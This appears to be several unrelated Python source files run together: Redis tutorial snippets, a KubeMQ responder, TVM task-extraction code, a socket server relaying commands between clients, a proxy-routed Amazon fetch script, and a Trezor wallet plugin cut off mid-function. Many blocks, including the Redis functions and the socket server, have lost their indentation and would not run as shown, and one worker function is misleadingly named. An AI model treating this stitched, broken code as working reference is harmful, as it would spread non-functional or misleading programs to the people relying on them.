#C Actually run the functions to see them work
#I When subscribing, we receive a message on the listen channel
#J These are the structures that are produced as items when we iterate over pubsub.listen()
#K When we unsubscribe, we receive a message telling us which channels we have unsubscribed from and the number of channels we are still subscribed to
#END
'''
'''
# <start id="sort-calls"/>
>>> conn.rpush('sort-input', 23, 15, 110, 7) #A
4 #A
>>> conn.sort('sort-input') #B
['7', '15', '23', '110'] #B
>>> conn.sort('sort-input', alpha=True) #C
['110', '15', '23', '7'] #C
>>> conn.hset('d-7', 'field', 5) #D
1L #D
>>> conn.hset('d-15', 'field', 1) #D
1L #D
>>> conn.hset('d-23', 'field', 9) #D
1L #D
>>> conn.hset('d-110', 'field', 3) #D
1L #D
>>> conn.sort('sort-input', by='d-*->field') #E
['15', '110', '7', '23'] #E
>>> conn.sort('sort-input', by='d-*->field', get='d-*->field') #F
['1', '3', '5', '9'] #F
# <end id="sort-calls"/>
#A Start by adding some items to a LIST
#B We can sort the items numerically
#C And we can sort the items alphabetically
#D We are just adding some additional data for SORTing and fetching
#E We can sort our data by fields of HASHes
#F And we can even fetch that data and return it instead of or in addition to our input data
#END
'''
'''
# <start id="simple-pipeline-notrans"/>
>>> def notrans():
... print conn.incr('notrans:') #A
... time.sleep(.1) #B
... conn.incr('notrans:', -1) #C
...
>>> if 1:
... for i in xrange(3): #D
... threading.Thread(target=notrans).start() #D
... time.sleep(.5) #E
...
1 #F
2 #F
3 #F
# <end id="simple-pipeline-notrans"/>
#A Increment the 'notrans:' counter and print the result
#B Wait for 100 milliseconds
#C Decrement the 'notrans:' counter
#D Start three threads to execute the non-transactional increment/sleep/decrement
#E Wait half a second for everything to be done
#F Because there is no transaction, each of the threaded commands can interleave freely, causing the counter to steadily grow in this case
#END
'''
'''
# <start id="simple-pipeline-trans"/>
>>> def trans():
... pipeline = conn.pipeline() #A
... pipeline.incr('trans:') #B
... time.sleep(.1) #C
... pipeline.incr('trans:', -1) #D
... print pipeline.execute()[0] #E
...
>>> if 1:
... for i in xrange(3): #F
... threading.Thread(target=trans).start() #F
... time.sleep(.5) #G
...
1 #H
1 #H
1 #H
# <end id="simple-pipeline-trans"/>
#A Create a transactional pipeline
#B Queue up the 'trans:' counter increment
#C Wait for 100 milliseconds
#D Queue up the 'trans:' counter decrement
#E Execute both commands and print the result of the increment operation
#F Start three of the transactional increment/sleep/decrement calls
#G Wait half a second for everything to be done
#H Because each increment/sleep/decrement pair is executed inside a transaction, no other commands can be interleaved, which gets us a result of 1 for all of our results
#END
'''
# <start id="exercise-fix-article-vote"/>
def article_vote(conn, user, article):
cutoff = time.time() - ONE_WEEK_IN_SECONDS
posted = conn.zscore('time:', article) #A
if posted < cutoff:
return
article_id = article.partition(':')[-1]
pipeline = conn.pipeline()
pipeline.sadd('voted:' + article_id, user)
pipeline.expire('voted:' + article_id, int(posted-cutoff)) #B
if pipeline.execute()[0]:
pipeline.zincrby('score:', article, VOTE_SCORE) #C
pipeline.hincrby(article, 'votes', 1) #C
pipeline.execute() #C
# <end id="exercise-fix-article-vote"/>
#A If the article should expire between our ZSCORE and our SADD, we need to use the posted time to properly expire it
#B Set the expiration time if we shouldn't have actually added the vote to the SET
#C We could lose our connection between the SADD/EXPIRE and ZINCRBY/HINCRBY, so the vote may not count, but that is better than it partially counting by failing between the ZINCRBY/HINCRBY calls
#END
# Technically, the above article_vote() version still has some issues, which
# are addressed in the following, which uses features/functionality not
# introduced until chapter 4.
def article_vote(conn, user, article):
cutoff = time.time() - ONE_WEEK_IN_SECONDS
posted = conn.zscore('time:', article)
article_id = article.partition(':')[-1]
voted = 'voted:' + article_id
pipeline = conn.pipeline()
while posted > cutoff:
try:
pipeline.watch(voted)
if not pipeline.sismember(voted, user):
pipeline.multi()
pipeline.sadd(voted, user)
pipeline.expire(voted, int(posted-cutoff))
pipeline.zincrby('score:', article, VOTE_SCORE)
pipeline.hincrby(article, 'votes', 1)
pipeline.execute()
else:
pipeline.unwatch()
return
except redis.exceptions.WatchError:
cutoff = time.time() - ONE_WEEK_IN_SECONDS
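# A minimal usage sketch (assuming a local Redis server and a freshly posted
# article; the WATCH/MULTI loop above simply retries if another client touches
# the 'voted:' SET between the membership check and the transaction):
'''
>>> conn = redis.Redis()
>>> conn.zadd('time:', 'article:1', time.time())
1
>>> article_vote(conn, 'user:7', 'article:1')
>>> conn.smembers('voted:1')
set(['user:7'])
>>> conn.zscore('score:', 'article:1')
432.0
'''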
# <start id="exercise-fix-get_articles"/>
def get_articles(conn, page, order='score:'):
start = max(page-1, 0) * ARTICLES_PER_PAGE
end = start + ARTICLES_PER_PAGE - 1
    ids = conn.zrevrange(order, start, end)
pipeline = conn.pipeline()
map(pipeline.hgetall, ids) #A
articles = []
for id, article_data in zip(ids, pipeline.execute()): #B
article_data['id'] = id
articles.append(article_data)
return articles
# <end id="exercise-fix-get_articles"/>
#A Prepare the HGETALL calls on the pipeline
#B Execute the pipeline and add ids to the article
#END
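# A minimal usage sketch (assuming a local Redis server with scored articles
# already present): page 1 returns at most ARTICLES_PER_PAGE dicts, each
# carrying the 'id' key added in the loop above.
'''
>>> articles = get_articles(conn, 1)
>>> len(articles) <= ARTICLES_PER_PAGE
True
>>> all('id' in article for article in articles)
True
'''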
'''
# <start id="other-calls-1"/>
>>> conn.set('key', 'value') #A
True #A
>>> conn.get('key') #A
'value' #A
>>> conn.expire('key', 2) #B
True #B
>>> time.sleep(2) #B
>>> conn.get('key') #B
>>> conn.set('key', 'value2')
True
>>> conn.expire('key', 100); conn.ttl('key') #C
True #C
100 #C
# <end id="other-calls-1"/>
#A We are starting with a very simple STRING value
#B If we set a key to expire in the future, and we wait long enough for the key to expire, when we try to fetch the key, it has already been deleted
#C We can also easily find out how long it will be before a key will expire
#END
'''
# <start id="exercise-no-recent-zset"/>
THIRTY_DAYS = 30*86400
def check_token(conn, token):
return conn.get('login:' + token) #A
def update_token(conn, token, user, item=None):
conn.setex('login:' + token, user, THIRTY_DAYS) #B
key = 'viewed:' + token
if item:
conn.lrem(key, item)
conn.rpush(key, item)
conn.ltrim(key, -25, -1)
conn.zincrby('viewed:', item, -1)
conn.expire(key, THIRTY_DAYS) #C
def add_to_cart(conn, session, item, count):
key = 'cart:' + session
if count <= 0:
        conn.hdel(key, item)
else:
conn.hset(key, item, count)
conn.expire(key, THIRTY_DAYS) #D
# <end id="exercise-no-recent-zset"/>
#A We are going to store the login token as a string value so we can EXPIRE it
#B Set the value of the login token and the token's expiration time with one call
#C We can't manipulate LISTs and set their expiration at the same time, so we must do it later
#D We also can't manipulate HASHes and set their expiration times, so we again do it later
#END
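# A minimal usage sketch (assuming a local Redis server; the token, user,
# session, and item names are hypothetical):
'''
>>> conn = redis.Redis()
>>> update_token(conn, 'tok1', 'user27', item='itemX')
>>> check_token(conn, 'tok1')
'user27'
>>> add_to_cart(conn, 'sess1', 'itemX', 3)
>>> conn.hgetall('cart:sess1')
{'itemX': '3'}
'''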
|
responder.py
|
# MIT License
#
# Copyright (c) 2018 KubeMQ
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import threading
import time
import grpc
from kubemq.grpc import Empty
from kubemq.basic.grpc_client import GrpcClient
from kubemq.commandquery.request_receive import RequestReceive
from kubemq.tools.listener_cancellation_token import ListenerCancellationToken
class Responder(GrpcClient):
"""An instance that responsible on receiving request from the kubeMQ."""
def __init__(self, kubemq_address=None):
"""
Initialize a new Responder to subscribe to Response.
        :param str kubemq_address: KubeMQ server address; if None, it is taken from config or an environment variable.
"""
GrpcClient.__init__(self)
if kubemq_address:
self._kubemq_address = kubemq_address
def ping(self):
"""ping check connection to the kubemq"""
ping_result = self.get_kubemq_client().Ping(Empty())
logging.debug("Responder KubeMQ address:%s ping result:%s'" % (self._kubemq_address, ping_result))
return ping_result
    def subscribe_to_requests(self, subscribe_request, handler, error_handler, listener_cancellation_token=ListenerCancellationToken()):
"""
        Register to a KubeMQ channel and handle incoming requests.
        :param SubscribeRequest subscribe_request: determines the subscription configuration.
        :param handler: callback invoked for every RequestReceive; should return the response to send back.
        :param error_handler: callback invoked when an error is received from KubeMQ.
        :param listener_cancellation_token: cancellation token; calling cancel() on it cancels the subscription.
        :return: the thread running the subscribe request.
"""
if not subscribe_request.channel:
raise ValueError("Channel parameter is mandatory.")
if not subscribe_request.is_valid_type("CommandQuery"):
raise ValueError("Invalid Subscribe Type for this Class.")
inner_subscribe_request = subscribe_request.to_inner_subscribe_request()
call = self.get_kubemq_client().SubscribeToRequests(inner_subscribe_request, metadata=self._metadata)
def subscribe_task(listener_cancellation_token):
while True:
try:
event_receive = call.next()
logging.debug("Responder InnerRequest. ID:'%s', Channel:'%s', ReplyChannel:'%s tags:'%s''" % (
event_receive.RequestID,
event_receive.Channel,
event_receive.ReplyChannel,
event_receive.Tags
))
if handler:
try:
response = handler(RequestReceive(event_receive))
logging.debug("Responder InnerResponse. ID:'%s', ReplyChannel:'%s'" % (
response.request_id,
response.reply_channel
))
                            self.get_kubemq_client().SendResponse(response.convert(), metadata=self._metadata)
except grpc.RpcError as error:
if (listener_cancellation_token.is_cancelled):
logging.info("Sub closed by listener request")
else:
logging.info("Subscriber Received Error: Error:'%s'" % (
str(error)
))
error_handler(error)
except Exception as e:
logging.info("Subscriber Received Error: Error:'%s'" % (
str(e)
))
error_handler(str(e))
except Exception as e:
logging.exception("An exception occurred while listening for request:'%s'" % (e))
raise # re-raise the original exception, keeping full stack trace
        def check_sub_to_valid(listener_cancellation_token):
            while True:
                if listener_cancellation_token.is_cancelled:
                    logging.info("Sub closed by listener request")
                    call.cancel()
                    return
                time.sleep(0.1)  # poll the cancellation token without busy-spinning a CPU core
thread = threading.Thread(target=subscribe_task, args=(listener_cancellation_token,))
thread.daemon = True
thread.start()
listener_thread = threading.Thread(target=check_sub_to_valid, args=(listener_cancellation_token,))
listener_thread.daemon = True
listener_thread.start()
return thread
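# A minimal usage sketch, kept hedged: only Responder itself is defined in this
# file, so the SubscribeRequest import path and constructor below are
# assumptions about the surrounding SDK, and both handlers are hypothetical.
#
# from kubemq.subscription import SubscribeRequest  # assumed module path
#
# def handle_request(request_receive):
#     ...  # build and return a Response object for this RequestReceive
#
# def handle_error(error):
#     logging.error("subscription error: %s", error)
#
# responder = Responder("localhost:50000")
# responder.ping()
# subscribe_request = SubscribeRequest(...)  # channel + "CommandQuery" subscribe type (assumed fields)
# responder.subscribe_to_requests(subscribe_request, handle_request, handle_error)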
|
relay_integration.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.te_compiler.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.te_compiler.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
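# A minimal usage sketch, assuming `mod` (a tvm.IRModule) and `params` are
# already obtained from a Relay frontend; everything else comes from this file.
#
# target = tvm.target.Target("llvm")
# tasks = extract_from_program(mod, params, target)
# for tsk in tasks:
#     print(tsk.name, tsk.args)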
|
server.py
|
import socket
import threading
import classes
import modules.generate as generator
PORT = 5000
valid_codes = []
rooms = []
def client_listener(conn, addr):
"""
Listens to clients and responds to requests
Args:
conn (socket.socket): the client connection
addr (tuple): where the connection is from
"""
print(f"connection from {addr}")
controller = False
control = conn.recv(4096).decode("utf-8")
new_room = conn.recv(4096).decode("utf-8")
room = None
if (control == "y") or (control == "Y"):
controller = True
conn.send("T".encode())
else:
conn.send("F".encode())
user = classes.client.Client(not controller, conn)
if (new_room == "y") or (new_room == "Y"):
code = generator.generate_code(8)
while code in valid_codes:
code = generator.generate_code(8)
valid_codes.append(code)
conn.send(code.encode())
room = classes.room.Room(code)
rooms.append(room)
if user.is_controlled():
room.add_controlled(user)
else:
room.add_controller(user)
else:
conn.send("code req".encode())
code = conn.recv(4096).decode("utf-8")
        while code not in valid_codes:
conn.send("wrong".encode())
code = conn.recv(4096).decode("utf-8")
conn.send("correct".encode())
for r in rooms:
if r.check_room_code(code):
room = r
if user.is_controlled():
room.add_controlled(user)
else:
room.add_controller(user)
running = True
while running:
msg = conn.recv(4096).decode()
cmd = conn.recv(4096).decode()
print(msg, cmd)
if msg == "disconnect":
running = False
else:
if not user.is_controlled():
targets = room.controlled
for target in targets:
target.send(msg)
target.send(cmd)
conn.close()
def main():
"""
main function
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.bind(("127.0.0.1", 5000))
sock.listen()
while True:
conn, addr = sock.accept()
threading.Thread(target=client_listener, args=(conn, addr)).start()
if __name__ == "__main__":
main()
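# A minimal client-side sketch derived from the handshake in client_listener()
# above: declare controller status, create a room, then send message/command
# pairs until "disconnect". Note that the back-to-back send() calls here (and
# in the server) assume TCP preserves message boundaries, which it does not
# guarantee; length-prefixed framing would make the protocol robust.
#
# def demo_client():
#     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
#         sock.connect(("127.0.0.1", PORT))
#         sock.send("y".encode())           # act as a controller
#         sock.send("y".encode())           # create a new room
#         print(sock.recv(4096).decode())   # "T"/"F" controller acknowledgement
#         print(sock.recv(4096).decode())   # room code for other clients to join
#         sock.send("hello".encode())       # message relayed to controlled clients
#         sock.send("noop".encode())        # the paired command
#         sock.send("disconnect".encode())  # ends the server loop...
#         sock.send("bye".encode())         # ...after the server's paired cmd recv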
|
process.py
|
import multiprocessing as mp
import random
import string
import requests
import time
random.seed(123)
# Define an output queue
output = mp.Queue()
# define an example worker function (fetches a URL through a proxy and reports the status code)
def rand_string(length, output):
proxies = { 'http': '83.149.70.159:13012', 'https': '83.149.70.159:13012'}
r = requests.get('https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dbaby-products&field-keywords=B00MRZIGVG', proxies=proxies)
output.put(r.status_code)
# Set up a list of processes that we want to run
processes = [mp.Process(target=rand_string, args=(5, output)) for x in range(4)]
s2 = time.time()
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
# Get process results from the output queue
results = [output.get() for p in processes]
s = time.time()
print(s - s2)
print(results)
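# A minimal alternative sketch using a process Pool instead of the manual
# Queue bookkeeping above; results come back in submission order. The request
# is the same call rand_string() makes, so the same proxy assumption applies.
#
# def fetch(_):
#     proxies = {'http': '83.149.70.159:13012', 'https': '83.149.70.159:13012'}
#     r = requests.get('https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dbaby-products&field-keywords=B00MRZIGVG', proxies=proxies)
#     return r.status_code
#
# if __name__ == '__main__':
#     pool = mp.Pool(processes=4)
#     print(pool.map(fetch, range(4)))
#     pool.close()
#     pool.join()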
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from qtum_electrum.util import bfh, bh2u
from qtum_electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from qtum_electrum.i18n import _
from qtum_electrum.plugins import BasePlugin
from qtum_electrum.transaction import deserialize
from qtum_electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
        # disable bridge because it seems to never return if a keepkey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
        def f(method):
            settings = self.request_trezor_init_settings(wizard, method, self.device)
            t = threading.Thread(target=self._initialize_device,
                                 args=(settings, method, device_id, wizard, handler))
            t.daemon = True
            t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
'''Called when creating a new wallet. Select the device to use. If
        the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_gen = wallet.keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
